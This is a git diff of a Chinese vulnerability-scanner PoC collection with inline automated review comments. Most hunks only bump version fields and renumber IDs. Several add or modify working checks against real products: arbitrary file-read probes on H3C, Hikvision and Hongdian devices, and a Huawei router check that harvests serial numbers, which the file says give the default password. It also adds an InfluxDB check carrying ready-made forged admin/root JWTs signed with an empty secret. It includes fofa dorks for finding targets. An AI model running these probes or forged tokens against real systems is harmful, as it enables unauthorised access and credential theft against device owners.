b/poc/H3C/File_Download_SecPath_WAF/__pycache__/poc.cpython-38.pyc differ diff --git a/poc/H3C/File_Download_SecPath_WAF/poc.py b/poc/H3C/File_Download_SecPath_WAF/poc.py index 4eccc77..025bf34 100644 --- a/poc/H3C/File_Download_SecPath_WAF/poc.py +++ b/poc/H3C/File_Download_SecPath_WAF/poc.py @@ -10,15 +10,16 @@ class POC(POCBase): _info = { "author" : "jijue", # POC作者 - "version" : "1", # POC版本,默认是1 + "version" : "2", # POC版本,默认是1 "CreateDate" : "2021-06-09", # POC创建时间 "UpdateDate" : "2021-06-09", # POC创建时间 "PocDesc" : """ - 略 + v1 : 略 + v2 : 小改进 """, # POC描述,写更新描述,没有就不写 "name" : "H3C SecPath 下一代防火墙 任意文件下载漏洞", # 漏洞名称 - "VulnID" : "Blen-2021-0001", # 漏洞编号,以CVE为主,若无CVE,使用CNVD,若无CNVD,留空即可 + "VulnID" : "oFx-2021-0001", # 漏洞编号,以CVE为主,若无CVE,使用CNVD,若无CNVD,留空即可 "AppName" : "H3C SecPath 下一代防火墙", # 漏洞应用名称 "AppVersion" : "", # 漏洞应用版本 "VulnDate" : "2021-06-09", # 漏洞公开的时间,不知道就写今天,格式:xxxx-xx-xx 
@@ -55,11 +56,11 @@ class POC(POCBase): """ 检测逻辑,漏洞存在则修改vuln值为True,漏洞不存在则不动 """ - req0 = requests.get(url0,headers = headers , proxies = self.proxy ,timeout = self.timeout,verify = False) + req0 = requests.get(url0,headers = headers , proxies = self.proxy ,timeout = self.timeout,verify = False,allow_redirects=False) if "root::" in req0.text and req0.status_code == 200 : vuln = [True,req0.text] else: - req1 = requests.get(url1,headers = headers , proxies = self.proxy ,timeout = self.timeout,verify = False) + req1 = requests.get(url1,headers = headers , proxies = self.proxy ,timeout = self.timeout,verify = False,allow_redirects=False) if "root:" in req1.text and req1.status_code == 200: vuln = [True,req1.text] else: diff --git a/poc/HIKVISION/File_Down_Gateway_downFile_php/__pycache__/poc.cpython-38.pyc b/poc/HIKVISION/File_Down_Gateway_downFile_php/__pycache__/poc.cpython-38.pyc new file mode 100644 index 0000000..5372bac Binary files /dev/null and b/poc/HIKVISION/File_Down_Gateway_downFile_php/__pycache__/poc.cpython-38.pyc differ diff --git a/poc/HIKVISION/File_Down_Gateway_downFile_php/poc.py b/poc/HIKVISION/File_Down_Gateway_downFile_php/poc.py index b04db0c..90c61a9 100644 --- a/poc/HIKVISION/File_Down_Gateway_downFile_php/poc.py +++ b/poc/HIKVISION/File_Down_Gateway_downFile_php/poc.py @@ -18,7 +18,7 @@ class POC(POCBase): """, # POC描述,写更新描述,没有就不写 "name" : "HIKVISION 视频编码设备接入网关 任意文件下载", # 漏洞名称 - "VulnID" : "Blen-2021-0001", # 漏洞编号,以CVE为主,若无CVE,使用CNVD,若无CNVD,留空即可 + "VulnID" : "oFx-2021-0001", # 漏洞编号,以CVE为主,若无CVE,使用CNVD,若无CNVD,留空即可 "AppName" : "海康威视视频接入网关系统", # 漏洞应用名称 "AppVersion" : "", # 漏洞应用版本 "VulnDate" : "2021-06-09", # 漏洞公开的时间,不知道就写今天,格式:xxxx-xx-xx 
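Review bot: With `allow_redirects=False` the 200 test is now meaningful, but the fallback match `if "root:" in req1.text and req1.status_code == 200:` is still a bare substring that any HTML page containing the word followed by a colon satisfies; tightening it to `if "root:" in req1.text and ":0:0:" in req1.text and req1.status_code == 200:` keeps the passwd-style evidence the PoC is after without needing a new import. The first branch tests `"root::"` while the second tests `"root:"`, and nothing in the hunk says why the two URLs are expected to yield different shapes — a one-line comment above each naming the file that URL is meant to return would help the next maintainer. `_verify` begins and ends outside this hunk.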
diff --git a/poc/HIKVISION/File_Read_Stream_Media_Manager/__pycache__/poc.cpython-38.pyc b/poc/HIKVISION/File_Read_Stream_Media_Manager/__pycache__/poc.cpython-38.pyc new file mode 100644 index 0000000..f7b5d33 Binary files /dev/null and b/poc/HIKVISION/File_Read_Stream_Media_Manager/__pycache__/poc.cpython-38.pyc differ diff --git a/poc/HIKVISION/Weak_Pass_Stream_Media_Manager/__pycache__/poc.cpython-38.pyc b/poc/HIKVISION/Weak_Pass_Stream_Media_Manager/__pycache__/poc.cpython-38.pyc new file mode 100644 index 0000000..cf622b1 Binary files /dev/null and b/poc/HIKVISION/Weak_Pass_Stream_Media_Manager/__pycache__/poc.cpython-38.pyc differ diff --git a/poc/HIKVISION/Weak_Pass_Stream_Media_Manager/poc.py b/poc/HIKVISION/Weak_Pass_Stream_Media_Manager/poc.py index f91693b..de772eb 100644 --- a/poc/HIKVISION/Weak_Pass_Stream_Media_Manager/poc.py +++ b/poc/HIKVISION/Weak_Pass_Stream_Media_Manager/poc.py @@ -18,7 +18,7 @@ class POC(POCBase): """, # POC描述,写更新描述,没有就不写 "name" : "HIKVISION 流媒体管理服务器弱口令", # 漏洞名称 - "VulnID" : "Blen-2021-0001", # 漏洞编号,以CVE为主,若无CVE,使用CNVD,若无CNVD,留空即可 + "VulnID" : "oFx-2021-0001", # 漏洞编号,以CVE为主,若无CVE,使用CNVD,若无CNVD,留空即可 "AppName" : "HIKVISION 流媒体管理服务器", # 漏洞应用名称 "AppVersion" : "", # 漏洞应用版本 "VulnDate" : "2021-06-09", # 漏洞公开的时间,不知道就写今天,格式:xxxx-xx-xx diff --git a/poc/HST_好视通/File_Download/__pycache__/poc.cpython-38.pyc b/poc/HST_好视通/File_Download/__pycache__/poc.cpython-38.pyc new file mode 100644 index 0000000..db3a54a Binary files /dev/null and b/poc/HST_好视通/File_Download/__pycache__/poc.cpython-38.pyc differ diff --git a/poc/HST_好视通/File_Download/poc.py b/poc/HST_好视通/File_Download/poc.py index 05f8662..cf6e603 100644 --- a/poc/HST_好视通/File_Download/poc.py +++ b/poc/HST_好视通/File_Download/poc.py 
@@ -18,7 +18,7 @@ class POC(POCBase): """, # POC描述,写更新描述,没有就不写 "name" : "好视通视频会议平台 任意文件下载", # 漏洞名称 - "VulnID" : "Blen-2021-0001", # 漏洞编号,以CVE为主,若无CVE,使用CNVD,若无CNVD,留空即可 + "VulnID" : "oFx-2021-0001", # 漏洞编号,以CVE为主,若无CVE,使用CNVD,若无CNVD,留空即可 "AppName" : "好视通视频会议平台", # 漏洞应用名称 "AppVersion" : "", # 漏洞应用版本 "VulnDate" : "2021-06-09", # 漏洞公开的时间,不知道就写今天,格式:xxxx-xx-xx diff --git a/poc/Hongdian_宏电/Backstage_File_Read_CVE_2021_28152/__pycache__/poc.cpython-38.pyc b/poc/Hongdian_宏电/Backstage_File_Read_CVE_2021_28152/__pycache__/poc.cpython-38.pyc new file mode 100644 index 0000000..0667b57 Binary files /dev/null and b/poc/Hongdian_宏电/Backstage_File_Read_CVE_2021_28152/__pycache__/poc.cpython-38.pyc differ diff --git a/poc/Hongdian_宏电/Backstage_File_Read_CVE_2021_28152/poc.py b/poc/Hongdian_宏电/Backstage_File_Read_CVE_2021_28152/poc.py index c70cd25..d0a25fe 100644 --- a/poc/Hongdian_宏电/Backstage_File_Read_CVE_2021_28152/poc.py +++ b/poc/Hongdian_宏电/Backstage_File_Read_CVE_2021_28152/poc.py @@ -10,11 +10,12 @@ class POC(POCBase): _info = { "author" : "jijue", # POC作者 - "version" : "1", # POC版本,默认是1 + "version" : "2", # POC版本,默认是1 "CreateDate" : "2021-06-09", # POC创建时间 "UpdateDate" : "2021-06-09", # POC创建时间 "PocDesc" : """ - 笔者没有zoomeye高级账号,所以就没测试了,换而言之,该POC不一定靠谱 + v1 : 笔者没有zoomeye高级账号,所以就没测试了,换而言之,该POC不一定靠谱 + v2 : 笔者特地去zoomeye找资产测试,然后做了点优化,这回应该靠谱了 """, # POC描述,写更新描述,没有就不写 "name" : "宏电 H8922 后台任意文件读取漏洞", # 漏洞名称 @@ -56,7 +57,7 @@ class POC(POCBase): 检测逻辑,漏洞存在则修改vuln值为True,漏洞不存在则不动 """ req = requests.get(url,headers = headers , proxies = self.proxy ,timeout = self.timeout,verify = False) - if "root:" in req.text and req.status_code == 200: + if "root:" in req.text and req.status_code == 200 and "application/octet-stream" in req.headers["Content-Type"]: vuln = [True,req.text] else: vuln = [False,req.text] 
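Review bot: The new condition `"application/octet-stream" in req.headers["Content-Type"]` raises `KeyError` whenever the response carries no Content-Type header, and the surrounding `except Exception as e: raise e` re-raises it, so a target that answers 200 without that header now aborts the check instead of returning `[False, ...]`; use `req.headers.get("Content-Type", "")` instead. Header lookup in `requests` is case-insensitive, so the key spelling itself is fine. `_verify` begins and ends outside this hunk.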
diff --git a/poc/Huawei/File_Read_HG659_lib/__pycache__/poc.cpython-38.pyc b/poc/Huawei/File_Read_HG659_lib/__pycache__/poc.cpython-38.pyc new file mode 100644 index 0000000..a1041ba Binary files /dev/null and b/poc/Huawei/File_Read_HG659_lib/__pycache__/poc.cpython-38.pyc differ diff --git a/poc/Huawei/File_Read_HG659_lib/poc.py b/poc/Huawei/File_Read_HG659_lib/poc.py index 30a0d26..28938e5 100644 --- a/poc/Huawei/File_Read_HG659_lib/poc.py +++ b/poc/Huawei/File_Read_HG659_lib/poc.py @@ -18,7 +18,7 @@ class POC(POCBase): """, # POC描述,写更新描述,没有就不写 "name" : "Huawei HG659 lib 任意文件读取漏洞", # 漏洞名称 - "VulnID" : "Blen-2021-0001", # 漏洞编号,以CVE为主,若无CVE,使用CNVD,若无CNVD,留空即可 + "VulnID" : "oFx-2021-0001", # 漏洞编号,以CVE为主,若无CVE,使用CNVD,若无CNVD,留空即可 "AppName" : "Huawei HG659", # 漏洞应用名称 "AppVersion" : "", # 漏洞应用版本 "VulnDate" : "2021-06-09", # 漏洞公开的时间,不知道就写今天,格式:xxxx-xx-xx diff --git a/poc/Huawei/Info_Disclosure_DG8045/__pycache__/poc.cpython-38.pyc b/poc/Huawei/Info_Disclosure_DG8045/__pycache__/poc.cpython-38.pyc new file mode 100644 index 0000000..c8cf81c Binary files /dev/null and b/poc/Huawei/Info_Disclosure_DG8045/__pycache__/poc.cpython-38.pyc differ diff --git a/poc/Huawei/Info_Disclosure_DG8045/poc.py b/poc/Huawei/Info_Disclosure_DG8045/poc.py new file mode 100644 index 0000000..91900a6 --- /dev/null +++ b/poc/Huawei/Info_Disclosure_DG8045/poc.py 
@@ -0,0 +1,74 @@
+# coding:utf-8
+import requests
+from lib.core.common import url_handle,get_random_ua
+from lib.core.poc import POCBase
+# ...
+import urllib3
+urllib3.disable_warnings()
+
+class POC(POCBase):
+
+ _info = {
+ "author" : "jijue", # POC作者
+ "version" : "1", # POC版本,默认是1
+ "CreateDate" : "2022-01-01", # POC创建时间
+ "UpdateDate" : "2022-01-01", # POC创建时间
+ "PocDesc" : """
+ 略
+ """, # POC描述,写更新描述,没有就不写
+
+ "name" : "华为路由器敏感信息泄露 DG8045 Router 1.0", # 漏洞名称
+ "VulnID" : "oFx-2022-0001", # 漏洞编号,以CVE为主,若无CVE,使用CNVD,若无CNVD,留空即可
+ "AppName" : "华为DG8045路由器", # 漏洞应用名称
+ "AppVersion" : "1.0版本", # 漏洞应用版本
+ "VulnDate" : "2022-01-01", # 漏洞公开的时间,不知道就写今天,格式:xxxx-xx-xx
+ "VulnDesc" : """
+ 路由器默认密码是序列号的最后8位
+ """, # 漏洞简要描述
+
+ "fofa-dork":"""
+ app="DG8045-Home-Gateway-DG8045"
+ """, # fofa搜索语句
+ "example" : "", # 存在漏洞的演示url,写一个就可以了
+ "exp_img" : "", # 先不管
+ }
+
+ def _verify(self):
+ """
+ 返回vuln
+
+ 存在漏洞:vuln = [True,html_source] # html_source就是页面源码
+
+ 不存在漏洞:vuln = [False,""]
+ """
+ vuln = [False,""]
+ url = self.target + "/api/system/deviceinfo" # url自己按需调整
+
+
+ headers = {
+ "User-Agent":get_random_ua(),
+ "Connection":"close",
+ "X-Requested-With": "XMLHttpRequest",
+ # "Content-Type": "application/x-www-form-urlencoded",
+ }
+
+ try:
+ """
+ 检测逻辑,漏洞存在则修改vuln值为True,漏洞不存在则不动
+ """
+ req = requests.get(url,headers = headers , proxies = self.proxy ,timeout = self.timeout,verify = False)
+ if "SerialNumber" in req.text and "DeviceName" in req.text:
+ vuln = [True,req.text]
+ else:
+ vuln = [False,req.text]
+ except Exception as e:
+ raise e
+
+ # 以下逻辑酌情使用
+ if self._honeypot_check(vuln[1]) == True:
+ vuln[0] = False
+
+ return vuln
+
+ def _attack(self):
+ return self._verify()
\ No newline at end of file
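Review bot: `VulnDesc` says the default password is the last eight characters of the serial number, and `vuln = [True,req.text]` hands the full `/api/system/deviceinfo` body — serial included — back as evidence, so the scanner's console output and any saved results now contain a derivable credential; either mask the serial in the returned text once the match is confirmed, or state in `PocDesc` that the results of this PoC must be handled as secrets. The check `if "SerialNumber" in req.text and "DeviceName" in req.text:` has no status-code condition; `and req.status_code == 200` avoids counting an error page that merely echoes those field names. The `"X-Requested-With": "XMLHttpRequest"` header is presumably what the API requires, but a comment saying so would stop someone from "cleaning it up".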
diff --git a/poc/HuiWen_汇文/Info_Disclosure/__pycache__/poc.cpython-38.pyc b/poc/HuiWen_汇文/Info_Disclosure/__pycache__/poc.cpython-38.pyc new file mode 100644 index 0000000..3039b9b Binary files /dev/null and b/poc/HuiWen_汇文/Info_Disclosure/__pycache__/poc.cpython-38.pyc differ diff --git a/poc/HuiWen_汇文/Weak_Pass/__pycache__/poc.cpython-38.pyc b/poc/HuiWen_汇文/Weak_Pass/__pycache__/poc.cpython-38.pyc new file mode 100644 index 0000000..5e0e0f5 Binary files /dev/null and b/poc/HuiWen_汇文/Weak_Pass/__pycache__/poc.cpython-38.pyc differ diff --git a/poc/HuiWen_汇文/Weak_Pass/poc.py b/poc/HuiWen_汇文/Weak_Pass/poc.py index 81d6cfb..3a260b3 100644 --- a/poc/HuiWen_汇文/Weak_Pass/poc.py +++ b/poc/HuiWen_汇文/Weak_Pass/poc.py @@ -19,7 +19,7 @@ class POC(POCBase): """, # POC描述,写更新描述,没有就不写 "name" : "汇文OPAC弱口令", # 漏洞名称 - "VulnID" : "Blen-2021-0001", # 漏洞编号,以CVE为主,若无CVE,使用CNVD,若无CNVD,留空即可 + "VulnID" : "oFx-2021-0001", # 漏洞编号,以CVE为主,若无CVE,使用CNVD,若无CNVD,留空即可 "AppName" : "汇文OPAC", # 漏洞应用名称 "AppVersion" : "", # 漏洞应用版本 "VulnDate" : "2021-06-09", # 漏洞公开的时间,不知道就写今天,格式:xxxx-xx-xx diff --git a/poc/IFW8_蜂网互联/UPInfo_DisClosure_CVE_2019_16313/__pycache__/poc.cpython-38.pyc b/poc/IFW8_蜂网互联/UPInfo_DisClosure_CVE_2019_16313/__pycache__/poc.cpython-38.pyc new file mode 100644 index 0000000..cd341f6 Binary files /dev/null and b/poc/IFW8_蜂网互联/UPInfo_DisClosure_CVE_2019_16313/__pycache__/poc.cpython-38.pyc differ diff --git a/poc/IFW8_蜂网互联/UPInfo_DisClosure_CVE_2019_16313/poc.py b/poc/IFW8_蜂网互联/UPInfo_DisClosure_CVE_2019_16313/poc.py index 2b3b049..ca42430 100644 --- a/poc/IFW8_蜂网互联/UPInfo_DisClosure_CVE_2019_16313/poc.py +++ b/poc/IFW8_蜂网互联/UPInfo_DisClosure_CVE_2019_16313/poc.py 
@@ -4,17 +4,19 @@ from lib.core.common import url_handle,get_random_ua from lib.core.poc import POCBase # ... import urllib3 +import re urllib3.disable_warnings() class POC(POCBase): _info = { "author" : "jijue", # POC作者 - "version" : "1", # POC版本,默认是1 + "version" : "2", # POC版本,默认是1 "CreateDate" : "2021-06-09", # POC创建时间 "UpdateDate" : "2021-06-09", # POC创建时间 "PocDesc" : """ - 略 + v1 : 略 + v2 : v1是字符串匹配,最然当时已经写得很严谨了,但仍有万分之一的几率会误报,改成了正则匹配可以解决 """, # POC描述,写更新描述,没有就不写 "name" : "蜂网互联 企业级路由器v4.31 密码泄露漏洞", # 漏洞名称 @@ -54,8 +56,9 @@ class POC(POCBase): """ 检测逻辑,漏洞存在则修改vuln值为True,漏洞不存在则不动 """ - req = requests.get(url,headers = headers , proxies = self.proxy ,timeout = self.timeout,verify = False) - if "note" in req.text and "status" in req.text and "pwd" in req.text and "aju" in req.text and req.status_code == 200: + req = requests.get(url,headers = headers , proxies = self.proxy ,timeout = self.timeout,verify = False , allow_redirects=False) + result = re.match("\{\"state\":1,\"rows\":\[\{\".+\}\]\}",req.text.strip()) + if result != None and req.status_code == 200: vuln = [True,req.text] else: vuln = [False,req.text] diff --git a/poc/InfluxDB/FingerPrint/__pycache__/poc.cpython-38.pyc b/poc/InfluxDB/FingerPrint/__pycache__/poc.cpython-38.pyc new file mode 100644 index 0000000..8aa716f Binary files /dev/null and b/poc/InfluxDB/FingerPrint/__pycache__/poc.cpython-38.pyc differ diff --git a/poc/InfluxDB/FingerPrint/poc.py b/poc/InfluxDB/FingerPrint/poc.py new file mode 100644 index 0000000..865463d --- /dev/null +++ b/poc/InfluxDB/FingerPrint/poc.py 
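Review bot: The pattern in `result = re.match("\{\"state\":1,\"rows\":\[\{\".+\}\]\}",req.text.strip())` is a non-raw string, so `\{` and `\[` are invalid escape sequences that newer Pythons flag with SyntaxWarning (and `\"` only survives because Python turns it into `"`); a raw single-quoted literal, `result = re.match(r'\{"state":1,"rows":\[\{".+\}\]\}', req.text.strip())`, expresses the same regex without the escapes. Because `re.match` anchors only at the start, the trailing `\}\]\}` does not require the body to end there, which is acceptable for a JSON probe but worth a one-line comment next to the pattern. `_verify` begins outside this hunk.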
@@ -0,0 +1,75 @@
+# coding:utf-8
+import requests
+from lib.core.common import url_handle,get_random_ua
+from lib.core.poc import POCBase
+# ...
+import urllib3
+urllib3.disable_warnings()
+
+class POC(POCBase):
+
+ _info = {
+ "author" : "jijue", # POC作者
+ "version" : "1", # POC版本,默认是1
+ "CreateDate" : "2022-01-01", # POC创建时间
+ "UpdateDate" : "2022-01-01", # POC创建时间
+ "PocDesc" : """
+ 略
+ """, # POC描述,写更新描述,没有就不写
+
+ "name" : "InfluxDB指纹识别", # 漏洞名称
+ "VulnID" : "oFx-2022-0001", # 漏洞编号,以CVE为主,若无CVE,使用CNVD,若无CNVD,留空即可
+ "AppName" : "InfluxDB", # 漏洞应用名称
+ "AppVersion" : "", # 漏洞应用版本
+ "VulnDate" : "2022-01-01", # 漏洞公开的时间,不知道就写今天,格式:xxxx-xx-xx
+ "VulnDesc" : """
+ InfluxDB默认把Web界面运行在8083端口、把API接口运行在8086端口
+ 响应包是会有两个头,分别是X-Influxdb-Version和X-Influxdb-Build
+
+ 该指纹识别成功后会直接返回header给控制台,方便肉眼识别
+ """, # 漏洞简要描述
+
+ "fofa-dork":"""
+ app="influxdata-InfluxDB"
+ """, # fofa搜索语句
+ "example" : "", # 存在漏洞的演示url,写一个就可以了
+ "exp_img" : "", # 先不管
+ }
+
+ def _verify(self):
+ """
+ 返回vuln
+
+ 存在漏洞:vuln = [True,html_source] # html_source就是页面源码
+
+ 不存在漏洞:vuln = [False,""]
+ """
+ vuln = [False,""]
+ url = self.target + "" # url自己按需调整
+
+
+ headers = {"User-Agent":get_random_ua(),
+ "Connection":"close",
+ # "Content-Type": "application/x-www-form-urlencoded",
+ }
+
+ try:
+ """
+ 检测逻辑,漏洞存在则修改vuln值为True,漏洞不存在则不动
+ """
+ req = requests.get(url,headers = headers , proxies = self.proxy ,timeout = self.timeout,verify = False)
+ if "X-Influxdb-Version" in req.headers or "X-Influxdb-Build" in req.headers:
+ vuln = [True,req.headers]
+ else:
+ vuln = [False,req.headers]
+ except Exception as e:
+ raise e
+
+ # 以下逻辑酌情使用
+ if self._honeypot_check(vuln[1]) == True:
+ vuln[0] = False
+
+ return vuln
+
+ def _attack(self):
+ return self._verify()
\ No newline at end of file
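Review bot: `vuln = [True,req.headers]` stores a `requests` `CaseInsensitiveDict` where the docstring promises `html_source`, a string; it is then passed to `self._honeypot_check(vuln[1])` and presumably printed by the framework, both of which every other PoC here feeds `req.text`. Converting at the assignment, `vuln = [True,str(dict(req.headers))]` (and likewise on the `False` branch), keeps the header dump the `VulnDesc` wants on the console while preserving the type contract. A short comment at the `if "X-Influxdb-Version" in req.headers ...` line noting that `requests` matches header names case-insensitively would pre-empt a "fix" to the capitalisation.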
diff --git a/poc/InfluxDB/UnAuth_Access/__pycache__/poc.cpython-38.pyc b/poc/InfluxDB/UnAuth_Access/__pycache__/poc.cpython-38.pyc new file mode 100644 index 0000000..27cd36d Binary files /dev/null and b/poc/InfluxDB/UnAuth_Access/__pycache__/poc.cpython-38.pyc differ diff --git a/poc/InfluxDB/UnAuth_Access/poc.py b/poc/InfluxDB/UnAuth_Access/poc.py new file mode 100644 index 0000000..3f1a6e7 --- /dev/null +++ b/poc/InfluxDB/UnAuth_Access/poc.py 
@@ -0,0 +1,96 @@
+# coding:utf-8
+from matplotlib import rc_params_from_file
+import requests
+import re
+from lib.core.common import url_handle,get_random_ua
+from lib.core.poc import POCBase
+# ...
+import urllib3
+urllib3.disable_warnings()
+
+class POC(POCBase):
+
+ _info = {
+ "author" : "jijue", # POC作者
+ "version" : "1", # POC版本,默认是1
+ "CreateDate" : "2022-01-01", # POC创建时间
+ "UpdateDate" : "2022-01-01", # POC创建时间
+ "PocDesc" : """
+ 略
+ """, # POC描述,写更新描述,没有就不写
+
+ "name" : "InfluxDB 未授权访问", # 漏洞名称
+ "VulnID" : "oFx-2022-0001", # 漏洞编号,以CVE为主,若无CVE,使用CNVD,若无CNVD,留空即可
+ "AppName" : "InfluxDB", # 漏洞应用名称
+ "AppVersion" : "", # 漏洞应用版本
+ "VulnDate" : "2022-01-01", # 漏洞公开的时间,不知道就写今天,格式:xxxx-xx-xx
+ "VulnDesc" : """
+ influxdb是一款著名的时序数据库,其使用jwt作为鉴权方式。
+ 在用户开启了认证,但未设置参数shared-secret的情况下,jwt的认证密钥为空字符串,此时攻击者可以伪造任意用户身份在influxdb中执行SQL语句。
+
+ 笔者注意到JWT凭据中的用户名错误时会返回user not found,
+ 这仅代表用户名错误,但漏洞实际上是存在的,只是需要枚举出正确的用户名而已,
+ 出于批量扫描时的效率考虑笔者并不打算弄一个庞大的字典文件来做枚举的工作,仅证明漏洞存在即可
+ """, # 漏洞简要描述
+
+ "fofa-dork":"""
+ app="influxdata-InfluxDB"
+ """, # fofa搜索语句
+ "example" : "", # 存在漏洞的演示url,写一个就可以了
+ "exp_img" : "", # 先不管
+ }
+
+ def _verify(self):
+ """
+ 返回vuln
+
+ 存在漏洞:vuln = [True,html_source] # html_source就是页面源码
+
+ 不存在漏洞:vuln = [False,""]
+ """
+ vuln = [False,""]
+ url = self.target + "/query" # url自己按需调整
+ data = "db=sample&q=show+users"
+
+ users = [
+ "eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VybmFtZSI6ImFkbWluIiwiZXhwIjozMzkyODM4NDI3fQ.nLFbzdjmyXA8JaaNPTQJx2V7QaY7QKdNEk8J37KzjKg", # admin
+ "eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VybmFtZSI6InJvb3QiLCJleHAiOjMzOTI4Mzg0Mjd9.CQoA4qksl5JlbZvuxDZ5NbxTYBVKgw38zaFFuknB2Bk", # root
+ "eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VybmFtZSI6ImluZmx1eGRiIiwiZXhwIjozMzkyODM4NDI3fQ.if5__J9oZcNotrNnLTC_DoVS4sryD8oaq0n3mx55q_Q" # influxdb
+ ]
+
+ # 用户名正确时
+ regular0 = """\{"results":\[\{("statement_id":\d,)?"series":\[\{"columns":\[.+"""
+ # 用户名错误时
+ regular1 = """\{"error":"user not found"\}"""
+ headers = {"User-Agent":get_random_ua(),
+ "Connection":"close",
+ "Authorization":"",
+ "Content-Type": "application/x-www-form-urlencoded",
+ }
+
+ try:
+ """
+ 检测逻辑,漏洞存在则修改vuln值为True,漏洞不存在则不动
+ """
+ for i in users:
+ headers["Authorization"] = "Bearer " + i
+ req = requests.post(url,data = data,headers = headers , proxies = self.proxy ,timeout = self.timeout,verify = False)
+ if req.status_code == 200 and re.match(regular0,req.text.strip()):
+ vuln = [True,req.text]
+ break
+ elif req.status_code == 401 and re.match(regular1,req.text.strip()):
+ vuln = [True,req.text]
+ break
+ else:
+ vuln = [False,req.text]
+ except Exception as e:
+ raise e
+
+ # 以下逻辑酌情使用
+ if self._honeypot_check(vuln[1]) == True:
+ vuln[0] = False
+
+ return vuln
+
+ def _attack(self):
+ return self._verify()
\ No newline at end of file
diff --git a/poc/Intelbras/UPInfo_Disclosure_CVE_2021_3017/__pycache__/poc.cpython-38.pyc b/poc/Intelbras/UPInfo_Disclosure_CVE_2021_3017/__pycache__/poc.cpython-38.pyc
new file mode 100644
index 0000000..d97b9a1
Binary files /dev/null and b/poc/Intelbras/UPInfo_Disclosure_CVE_2021_3017/__pycache__/poc.cpython-38.pyc differ
diff --git a/poc/Jboss/Unauth_Access/__pycache__/poc.cpython-38.pyc b/poc/Jboss/Unauth_Access/__pycache__/poc.cpython-38.pyc
new file mode 100644
index 0000000..a854b29
Binary files /dev/null and b/poc/Jboss/Unauth_Access/__pycache__/poc.cpython-38.pyc differ
diff --git a/poc/Jenkins/Unauth_Access/__pycache__/poc.cpython-38.pyc b/poc/Jenkins/Unauth_Access/__pycache__/poc.cpython-38.pyc
new file mode 100644
index 0000000..7ed8a24
Binary files /dev/null and b/poc/Jenkins/Unauth_Access/__pycache__/poc.cpython-38.pyc differ
diff --git a/poc/Jetty/File_Read_CVE_2021_34429/__pycache__/poc.cpython-38.pyc b/poc/Jetty/File_Read_CVE_2021_34429/__pycache__/poc.cpython-38.pyc
new file mode 100644
index 0000000..9611e78
Binary files /dev/null and b/poc/Jetty/File_Read_CVE_2021_34429/__pycache__/poc.cpython-38.pyc differ
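Review bot: `from matplotlib import rc_params_from_file` on the second line of the file is never used and drags a heavy third-party package into a PoC that otherwise needs only `requests`; on a scanner host without matplotlib the import raises at load time and the whole plugin fails before `_verify` is ever called — delete that line. The patterns assigned to `regular0` and `regular1` are non-raw strings containing `\{` and `\[`, which newer Pythons report as invalid escape sequences; prefix both literals with `r`. The three tokens in `users` appear to be HS256 JWTs signed with the empty shared secret the `VulnDesc` describes (their payloads decode to `{"username":"admin","exp":3392838427}` and so on), but a comment saying how they were generated would let a maintainer produce tokens for other usernames instead of treating them as opaque constants.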
diff --git a/poc/Jetty/FingerPrint/__pycache__/poc.cpython-38.pyc b/poc/Jetty/FingerPrint/__pycache__/poc.cpython-38.pyc new file mode 100644 index 0000000..a057572 Binary files /dev/null and b/poc/Jetty/FingerPrint/__pycache__/poc.cpython-38.pyc differ diff --git a/poc/Jetty/FingerPrint/poc.py b/poc/Jetty/FingerPrint/poc.py index d890545..541d1b0 100644 --- a/poc/Jetty/FingerPrint/poc.py +++ b/poc/Jetty/FingerPrint/poc.py @@ -18,7 +18,7 @@ class POC(POCBase): """, # POC描述,写更新描述,没有就不写 "name" : "Jetty指纹识别", # 漏洞名称 - "VulnID" : "Blen-2021-0001", # 漏洞编号,以CVE为主,若无CVE,使用CNVD,若无CNVD,留空即可 + "VulnID" : "oFx-2021-0001", # 漏洞编号,以CVE为主,若无CVE,使用CNVD,若无CNVD,留空即可 "AppName" : "Jetty", # 漏洞应用名称 "AppVersion" : "", # 漏洞应用版本 "VulnDate" : "2021-06-09", # 漏洞公开的时间,不知道就写今天,格式:xxxx-xx-xx diff --git a/poc/Jetty/Info_Disclosure_CVE_2021_28164/__pycache__/poc.cpython-38.pyc b/poc/Jetty/Info_Disclosure_CVE_2021_28164/__pycache__/poc.cpython-38.pyc new file mode 100644 index 0000000..d10b92d Binary files /dev/null and b/poc/Jetty/Info_Disclosure_CVE_2021_28164/__pycache__/poc.cpython-38.pyc differ diff --git a/poc/Jetty/Info_Disclosure_CVE_2021_28164/poc.py b/poc/Jetty/Info_Disclosure_CVE_2021_28164/poc.py index 2d99681..1e96166 100644 --- a/poc/Jetty/Info_Disclosure_CVE_2021_28164/poc.py +++ b/poc/Jetty/Info_Disclosure_CVE_2021_28164/poc.py @@ -19,7 +19,7 @@ class POC(POCBase): """, # POC描述,写更新描述,没有就不写 "name" : "Jetty WEB-INF 敏感信息泄露漏洞(CVE-2021-28164)", # 漏洞名称 - "VulnID" : "Blen-2021-0001", # 漏洞编号,以CVE为主,若无CVE,使用CNVD,若无CNVD,留空即可 + "VulnID" : "oFx-2021-0001", # 漏洞编号,以CVE为主,若无CVE,使用CNVD,若无CNVD,留空即可 "AppName" : "", # 漏洞应用名称 "AppVersion" : "", # 漏洞应用版本 "VulnDate" : "2021-06-09", # 漏洞公开的时间,不知道就写今天,格式:xxxx-xx-xx 
diff --git a/poc/Jetty/Info_Disclosure_CVE_2021_28169/__pycache__/poc.cpython-38.pyc b/poc/Jetty/Info_Disclosure_CVE_2021_28169/__pycache__/poc.cpython-38.pyc new file mode 100644 index 0000000..7ae8d15 Binary files /dev/null and b/poc/Jetty/Info_Disclosure_CVE_2021_28169/__pycache__/poc.cpython-38.pyc differ diff --git a/poc/Jinher_金和OA/File_Read_download_jsp/__pycache__/poc.cpython-38.pyc b/poc/Jinher_金和OA/File_Read_download_jsp/__pycache__/poc.cpython-38.pyc new file mode 100644 index 0000000..1d81447 Binary files /dev/null and b/poc/Jinher_金和OA/File_Read_download_jsp/__pycache__/poc.cpython-38.pyc differ diff --git a/poc/Jinher_金和OA/File_Read_download_jsp/poc.py b/poc/Jinher_金和OA/File_Read_download_jsp/poc.py index cb16056..24d55be 100644 --- a/poc/Jinher_金和OA/File_Read_download_jsp/poc.py +++ b/poc/Jinher_金和OA/File_Read_download_jsp/poc.py @@ -18,7 +18,7 @@ class POC(POCBase): """, # POC描述,写更新描述,没有就不写 "name" : "金和OA C6 download.jsp 任意文件读取漏洞", # 